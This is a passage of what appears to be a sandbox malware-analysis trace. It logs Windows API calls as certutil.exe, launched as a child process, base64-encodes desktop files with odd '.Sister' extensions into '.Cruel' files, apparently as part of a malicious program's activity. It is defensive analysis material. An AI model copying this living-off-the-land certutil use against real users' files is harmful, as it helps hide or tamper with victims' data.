cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0222.207] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0222.207] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0222.207] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x290bc9d0c70 [0222.207] GetComputerNameW (in: lpBuffer=0x290bc9d0c70, nSize=0xe3f32df470 | out: lpBuffer="NQDPDE", nSize=0xe3f32df470) returned 1 [0222.207] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xe3f32df440 | out: lpBuffer=0x0, nSize=0xe3f32df440) returned 0 [0222.208] GetLastError () returned 0xea [0222.208] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x290bc9bb6f0 [0222.208] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x290bc9bb6f0, nSize=0xe3f32df440 | out: lpBuffer="NQdPdE", nSize=0xe3f32df440) returned 1 [0222.208] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0222.211] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x290bc9d1340, cbCertEncoded=0x6a6f) returned 0x0 [0222.214] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x290bc9d1340, cbCrlEncoded=0x6a6f) returned 0x0 [0222.216] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x290bc9d1340, cbEncoded=0x6a6f, dwFlags=0x8000, pDecodePara=0xe3f32df320, pvStructInfo=0xe3f32df3b0, pcbStructInfo=0xe3f32df3a4 | out: pvStructInfo=0xe3f32df3b0, pcbStructInfo=0xe3f32df3a4) returned 0 [0222.216] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x290bc9d1340, cbEncoded=0x6a6f, dwFlags=0x8000, pDecodePara=0xe3f32df320, pvStructInfo=0xe3f32df3b0, pcbStructInfo=0xe3f32df3a4 | out: pvStructInfo=0xe3f32df3b0, pcbStructInfo=0xe3f32df3a4) returned 0 [0222.216] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x290bc9d1340, cbEncoded=0x6a6f, dwFlags=0x8000, pDecodePara=0xe3f32df320, pvStructInfo=0xe3f32df3b0, pcbStructInfo=0xe3f32df3a4 | out: pvStructInfo=0xe3f32df3b0, pcbStructInfo=0xe3f32df3a4) returned 0 [0222.217] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x290bc9cca80 [0222.227] CryptMsgUpdate (hCryptMsg=0x290bc9cca80, pbData=0x290bc9d1340, cbData=0x6a6f, fFinal=1) returned 0 [0222.227] GetLastError () returned 0x8009310b [0222.227] CryptMsgClose (hCryptMsg=0x290bc9cca80) returned 1 [0222.227] GetFileAttributesExW (in: lpFileName="GQcSsii2kuOdN456.odt.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt.sister"), fInfoLevelId=0x0, lpFileInformation=0xe3f32df3d0 | out: lpFileInformation=0xe3f32df3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c950, ftCreationTime.dwHighDateTime=0x1d5e5cd, ftLastAccessTime.dwLowDateTime=0xecd45db0, ftLastAccessTime.dwHighDateTime=0x1d5efb4, ftLastWriteTime.dwLowDateTime=0xecd45db0, ftLastWriteTime.dwHighDateTime=0x1d5efb4, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f)) returned 1 [0222.227] _vsnwprintf (in: _Buffer=0xe3f32df3d8, _BufferCount=0xb, _Format="%d", _ArgList=0xe3f32df3c8 | out: _Buffer="359") returned 3 [0222.227] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xe3f32df190, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0222.227] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x290bc9d0fd0 [0222.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0222.227] _vsnwprintf (in: _Buffer=0xe3f32de3c0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xe3f32df418 | out: _Buffer="Input Length = 27247") returned 20 [0222.228] GetFileType (hFile=0x50) returned 0x2 [0222.228] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe3f32de3c0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xe3f32de374, lpReserved=0x0 | out: lpBuffer=0xe3f32de3c0*, lpNumberOfCharsWritten=0xe3f32de374*=0x14) returned 1 [0222.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0222.384] _vsnwprintf (in: _Buffer=0xe3f32de3c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe3f32df418 | out: _Buffer="\n") returned 1 [0222.385] GetFileType (hFile=0x50) returned 0x2 [0222.385] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe3f32de3c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe3f32de374, lpReserved=0x0 | out: lpBuffer=0xe3f32de3c0*, lpNumberOfCharsWritten=0xe3f32de374*=0x1) returned 1 [0222.594] GetFileAttributesExW (in: lpFileName="GQcSsii2kuOdN456.odt.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt.cruel"), fInfoLevelId=0x0, lpFileInformation=0xe3f32df3d0 | out: lpFileInformation=0xe3f32df3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b01a9, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xaf3b01a9, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xaf43a5f1, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x9294)) returned 1 [0222.594] _vsnwprintf (in: _Buffer=0xe3f32df3d8, _BufferCount=0xb, _Format="%d", _ArgList=0xe3f32df3c8 | out: _Buffer="361") returned 3 [0222.594] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xe3f32df190, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0222.595] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x290bc9d1300 [0222.595] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0222.595] _vsnwprintf (in: _Buffer=0xe3f32de3c0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xe3f32df418 | out: _Buffer="Output Length = 37524") returned 21 [0222.595] GetFileType (hFile=0x50) returned 0x2 [0222.595] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe3f32de3c0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xe3f32de374, lpReserved=0x0 | out: lpBuffer=0xe3f32de3c0*, lpNumberOfCharsWritten=0xe3f32de374*=0x15) returned 1 [0222.700] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0222.700] _vsnwprintf (in: _Buffer=0xe3f32de3c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe3f32df418 | out: _Buffer="\n") returned 1 [0222.700] GetFileType (hFile=0x50) returned 0x2 [0222.701] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe3f32de3c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe3f32de374, lpReserved=0x0 | out: lpBuffer=0xe3f32de3c0*, lpNumberOfCharsWritten=0xe3f32de374*=0x1) returned 1 [0222.776] LocalFree (hMem=0x290bc9d1340) returned 0x0 [0222.780] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0222.780] _vsnwprintf (in: _Buffer=0xe3f32df438, _BufferCount=0xb, _Format="%d", _ArgList=0xe3f32df428 | out: _Buffer="2022") returned 4 [0222.780] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xe3f32df1f0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0222.780] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x290bc9a8920 [0222.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0222.781] _vsnwprintf (in: _Buffer=0xe3f32de420, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xe3f32df478 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0222.781] GetFileType (hFile=0x50) returned 0x2 [0222.781] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe3f32de420*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xe3f32de3d4, lpReserved=0x0 | out: lpBuffer=0xe3f32de420*, lpNumberOfCharsWritten=0xe3f32de3d4*=0x31) returned 1 [0222.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0222.944] _vsnwprintf (in: _Buffer=0xe3f32de420, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe3f32df478 | out: _Buffer="\n") returned 1 [0222.944] GetFileType (hFile=0x50) returned 0x2 [0222.945] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe3f32de420*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe3f32de3d4, lpReserved=0x0 | out: lpBuffer=0xe3f32de420*, lpNumberOfCharsWritten=0xe3f32de3d4*=0x1) returned 1 [0223.031] LocalFree (hMem=0x0) returned 0x0 [0223.031] LocalFree (hMem=0x290bc9abf40) returned 0x0 [0223.031] LocalFree (hMem=0x290bc9b0cc0) returned 0x0 [0223.032] SetLastError (dwErrCode=0x80070716) [0223.032] _vsnwprintf (in: _Buffer=0xe3f32df4a8, _BufferCount=0xb, _Format="%d", _ArgList=0xe3f32df498 | out: _Buffer="511") returned 3 [0223.032] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xe3f32df260, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0223.032] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x290bc9d0e80 [0223.032] PostQuitMessage (nExitCode=0) [0223.033] GetMessageW (in: lpMsg=0xe3f32dfaa0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe3f32dfaa0) returned 0 [0223.033] LocalFree (hMem=0x290bc9bb6f0) returned 0x0 [0223.033] LocalFree (hMem=0x290bc9d0c70) returned 0x0 [0223.033] LocalFree (hMem=0x0) returned 0x0 [0223.033] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0223.034] GetLastError () returned 0x7e [0223.034] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0223.034] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0223.034] DllMain () returned 0x1 [0223.034] LocalFree (hMem=0x290bc9bb4b0) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9ab930) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9d0fd0) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9d1300) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9a8920) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9d0e80) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9b4490) returned 0x0 [0223.035] LocalFree (hMem=0x290bc9aba50) returned 0x0 [0223.035] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0223.035] GetLastError () returned 0x7e [0223.035] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0223.035] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0223.035] DllMain () returned 0x1 [0223.035] exit (_Code=0) Thread: id = 49 os_tid = 0xdb8 Process: id = "16" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x7057d000" os_pid = "0x6ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 50 os_tid = 0x6d8 [0225.182] GetStartupInfoW (in: lpStartupInfo=0xb358d6f970 | out: lpStartupInfo=0xb358d6f970*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0225.183] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0225.183] __set_app_type (_Type=0x1) [0225.184] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0225.184] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0225.188] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0225.188] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0225.189] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0225.189] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0225.189] WerSetFlags () returned 0x0 [0225.190] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.190] __iob_func () returned 0x7ffcea2dea00 [0225.190] _fileno (_File=0x7ffcea2dea30) returned 1 [0225.190] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0225.190] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0225.192] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0225.192] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0225.192] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0225.193] GetConsoleOutputCP () returned 0x1b5 [0225.363] _vsnwprintf (in: _Buffer=0xb358d6f8e0, _BufferCount=0xb, _Format=".%d", _ArgList=0xb358d6f808 | out: _Buffer=".437") returned 4 [0225.363] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0225.364] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.364] GetFileType (hFile=0x50) returned 0x2 [0225.364] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0225.364] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0225.364] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.471] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0225.471] GetCommandLineW () returned="certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"" [0225.471] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1f6e28cc4a0 [0225.471] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f6e28bcca0 [0225.472] LocalFree (hMem=0x1f6e28cc4a0) returned 0x0 [0225.472] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f6e28c1ea0 [0225.472] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1f6e28c1ed0 [0225.472] LocalFree (hMem=0x1f6e28c1ea0) returned 0x0 [0225.472] LocalFree (hMem=0x1f6e28bcca0) returned 0x0 [0225.472] LocalFree (hMem=0x0) returned 0x0 [0225.472] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0225.472] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0225.473] GetCommandLineW () returned="certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"" [0225.473] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1f6e28cc700 [0225.473] GetSystemTime (in: lpSystemTime=0xb358d6f5d0 | out: lpSystemTime=0xb358d6f5d0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x0, wMilliseconds=0xe)) [0225.473] SystemTimeToFileTime (in: lpSystemTime=0xb358d6f5d0, lpFileTime=0xb358d6f5c8 | out: lpFileTime=0xb358d6f5c8) returned 1 [0225.474] FileTimeToLocalFileTime (in: lpFileTime=0xb358d6f5c8, lpLocalFileTime=0xb358d6f590 | out: lpLocalFileTime=0xb358d6f590) returned 1 [0225.474] FileTimeToSystemTime (in: lpFileTime=0xb358d6f590, lpSystemTime=0xb358d6f300 | out: lpSystemTime=0xb358d6f300) returned 1 [0225.474] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xb358d6f300, lpFormat=0x0, lpDateStr=0xb358d6f410, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0225.474] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xb358d6f300, lpFormat=0x0, lpTimeStr=0xb358d6f310, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0225.474] _vsnwprintf (in: _Buffer=0xb358d6f31e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xb358d6f2e8 | out: _Buffer=" 00.014s") returned 8 [0225.474] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1f6e28ce6b0 [0225.474] SetLastError (dwErrCode=0x80070716) [0225.474] _vsnwprintf (in: _Buffer=0xb358d6f398, _BufferCount=0xb, _Format="%d", _ArgList=0xb358d6f388 | out: _Buffer="948") returned 3 [0225.474] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xb358d6f150, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0225.475] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1f6e28ccb60 [0225.475] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1f6e28c5290 [0225.475] LocalFree (hMem=0x1f6e28ce6b0) returned 0x0 [0225.475] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xb358d6f640 | out: lpSystemTimeAsFileTime=0xb358d6f640*(dwLowDateTime=0xb1008f87, dwHighDateTime=0x1d6141f)) [0225.475] GetLocalTime (in: lpSystemTime=0xb358d6f678 | out: lpSystemTime=0xb358d6f678*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x0, wMilliseconds=0xf)) [0225.475] SystemTimeToFileTime (in: lpSystemTime=0xb358d6f678, lpFileTime=0xb358d6f650 | out: lpFileTime=0xb358d6f650) returned 1 [0225.475] CompareFileTime (lpFileTime1=0xb358d6f650, lpFileTime2=0xb358d6f640) returned 1 [0225.475] _vsnwprintf (in: _Buffer=0xb358d6f688, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xb358d6f618 | out: _Buffer="GMT + 2.00") returned 10 [0225.475] LocalFree (hMem=0x1f6e28cc700) returned 0x0 [0225.476] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0225.476] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0225.476] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0225.476] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0225.476] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0225.476] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xb358d6f6b8 | out: _Buffer="10.0.15063.447") returned 14 [0225.476] GetACP () returned 0x4e4 [0225.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0225.476] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f6e28cc760 [0225.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f6e28cc760, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0225.476] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f6e28ce6f0 [0225.476] _vsnwprintf (in: _Buffer=0x1f6e28ce6f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xb358d6f708 | out: _Buffer="10.0.15063.447 retail") returned 21 [0225.476] LocalFree (hMem=0x1f6e28cc760) returned 0x0 [0225.476] LocalFree (hMem=0x0) returned 0x0 [0225.476] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0225.476] GetACP () returned 0x4e4 [0225.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0225.477] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f6e28ccac0 [0225.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f6e28ccac0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0225.477] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f6e28ce7b0 [0225.477] _vsnwprintf (in: _Buffer=0x1f6e28ce7b0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xb358d6f708 | out: _Buffer="10.0.15063.447 retail") returned 21 [0225.477] LocalFree (hMem=0x1f6e28ccac0) returned 0x0 [0225.477] LocalFree (hMem=0x0) returned 0x0 [0225.477] GetACP () returned 0x4e4 [0225.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0225.477] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f6e28cc660 [0225.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f6e28cc660, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0225.477] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f6e28ce670 [0225.477] _vsnwprintf (in: _Buffer=0x1f6e28ce670, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xb358d6f738 | out: _Buffer="10.0.15063.447 retail") returned 21 [0225.477] LocalFree (hMem=0x1f6e28cc660) returned 0x0 [0225.477] LocalFree (hMem=0x1f6e28ce6f0) returned 0x0 [0225.477] LocalFree (hMem=0x1f6e28ce7b0) returned 0x0 [0225.477] LocalFree (hMem=0x1f6e28ce670) returned 0x0 [0225.477] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0225.478] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0225.478] GetStockObject (i=0) returned 0x900010 [0225.478] RegisterClassW (lpWndClass=0xb358d6f860) returned 0xc1a2 [0225.478] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x402c6 [0225.549] NtdllDefWindowProc_W () returned 0x0 [0225.549] NtdllDefWindowProc_W () returned 0x1 [0225.557] NtdllDefWindowProc_W () returned 0x0 [0225.572] UpdateWindow (hWnd=0x402c6) returned 1 [0225.572] PostMessageW (hWnd=0x402c6, Msg=0x400, wParam=0x0, lParam=0x1f6e28b217e) returned 1 [0225.572] GetMessageW (in: lpMsg=0xb358d6f8b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb358d6f8b0) returned 1 [0225.572] TranslateMessage (lpMsg=0xb358d6f8b0) returned 0 [0225.572] DispatchMessageW (lpMsg=0xb358d6f8b0) returned 0x0 [0225.572] NtdllDefWindowProc_W () returned 0x0 [0225.572] GetMessageW (in: lpMsg=0xb358d6f8b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb358d6f8b0) returned 1 [0225.572] TranslateMessage (lpMsg=0xb358d6f8b0) returned 0 [0225.572] DispatchMessageW (lpMsg=0xb358d6f8b0) returned 0x0 [0225.572] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x1f6e28b4430 [0225.573] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x1f6e28b9180 [0225.573] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0225.573] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0225.573] SetLastError (dwErrCode=0x80070716) [0225.573] _vsnwprintf (in: _Buffer=0xb358d6f2b8, _BufferCount=0xb, _Format="%d", _ArgList=0xb358d6f2a8 | out: _Buffer="465") returned 3 [0225.573] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xb358d6f070, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0225.573] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f6e28c2200 [0225.573] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0225.573] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0225.574] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xb358d6f050, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0225.574] GetLastError () returned 0xcb [0225.574] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0225.574] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0225.574] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0225.575] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0225.575] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0225.575] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0225.575] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0225.575] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) 